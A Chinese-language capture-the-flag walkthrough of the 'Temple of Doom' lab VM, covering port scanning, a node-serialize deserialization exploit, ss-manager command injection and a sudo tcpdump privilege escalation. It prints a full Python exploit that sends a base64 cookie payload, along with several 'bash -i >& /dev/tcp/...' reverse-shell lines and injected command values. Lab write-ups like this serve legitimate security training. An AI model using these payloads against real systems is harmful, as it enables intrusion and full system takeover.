25-temple-of-DOOM-v1

image-20241201160806473

信息收集

1
2
3
arp-scan -l          nmap --min-rate 100000 -p- 192.168.240.133     nmap --min-rate 100000 -p22,666 -A 192.168.240.133

dirsearch -u 192.168.240.133   dirb  http://192.168.240.133/      nikto -host 192.168.240.133 -p 666
1
2
3
4

22/tcp  open  ssh
666/tcp open  doom

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

Nmap scan report for 192.168.240.133
Host is up (0.00036s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
|   256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_  256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 00:0C:29:D8:5F:B7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop


http://192.168.240.133:666 [200 OK] Cookies[profile], Country[RESERVED][ZZ], HttpOnly[profile], IP[192.168.240.133], X-Powered-By[Express]


┌──(root㉿penetration)-[/home/kali]
└─# nikto -host 192.168.240.133 -p 666
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.240.133
+ Target Hostname:    192.168.240.133
+ Target Port:        666
+ Start Time:         2024-12-01 16:18:10 (GMT8)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: Retrieved x-powered-by header: Express.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: GET, HEAD .
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8113 requests: 11 error(s) and 5 item(s) reported on remote host
+ End Time:           2024-12-01 16:18:24 (GMT8) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

渗透测试

666端口

1
2
3
Node.js Express framework,寻找nodejs的漏洞
 searchsploit nodejs
 需要用这个远程代码执行

image-20241201165546980

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
# Exploit Author: UndeadLarva
# Software Link: https://www.npmjs.com/package/node-serialize
# Version: 0.0.4
# CVE: CVE-2017-5941

import requests
import re
import base64
import sys

url = 'http://192.168.240.133:666/' # change this

payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
"return function () {"
"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
"console.log('still inside');"
"const { exec } = require('child_process');"
"exec('bash -i >& /dev/tcp/192.168.240.130/1111 0>&1');" # change this
"}"
"})(require('http').ServerResponse.prototype.end)")

# rce = "_$$ND_FUNC$$_process.exit(0)"
# code ="_$$ND_FUNC$$_console.log('behind you')"
code = "_$$ND_FUNC$$_" + payload

string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'

cookie = {'profile':base64.b64encode(string)}

try:
    response = requests.get(url, cookies=cookie).text
    print response
except requests.exceptions.RequestException as e:
    print('Oops!')
    sys.exit(1)

image-20241201170453466

提权

1
2
3
ls /home 发现了fireman账号
ps aux | grep fireman  查看该账号有没有能够提权的进程
这个是用root权限开启的多用户管理进程

image-20241201170851223

1
在当前shell中 用nc监听本地的8839端口(UDP)  nc -u 127.0.0.1 8839  接着执行add: {"server_port":8003, "password":"test", "method":"||touch /tmp/evil||"}   这时看一下/tmp就能发现多了一个evil,method后面的是命令执行,换成反弹shell

image-20241201175108618

1
2
3
4
5
(ss-manager)为fireman用户所有,所以我们可以利用该漏洞再次进行反弹shell操作
这样我们就可以获取到fireman用户,我们nc -lvp 1113监听1113端口
shell里输入add: {"server_port":8004, "password":"test", "method":"||bash -i >& /dev/tcp/192.168.240.130/1113 0>&1||"}

我弹了好几次才弹上,现在拿到fireman的权限了

image-20241201180352155

1
sudo -l查找能提权的文件  tcpdump有相关提权漏洞,https://gtfobins.github.io/这个网站能搜索提权命令

image-20241201180534057

image-20241201180735037

1
2
3
4
5
6
7
我们有sudo权限,用sudo那个。该提权方法同样也是通过反弹shell进行提权,先在文件中写入反弹shell(同样需要一个未被占用的端口进行监听),将文件写入到/tmp目录下(该目录下通常权限较高)
echo "bash -i >& /dev/tcp/192.168.240.130/1114 0>&1" > /tmp/shell.sh
chmod +x shell.sh
nc -lvvp 1114 (攻击机监听)
我们需要对提供的命令进行小幅度修改
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root  修改了网口,lo是本地localhost,eth0是外部网卡

image-20241201181430554

image-20241201181458635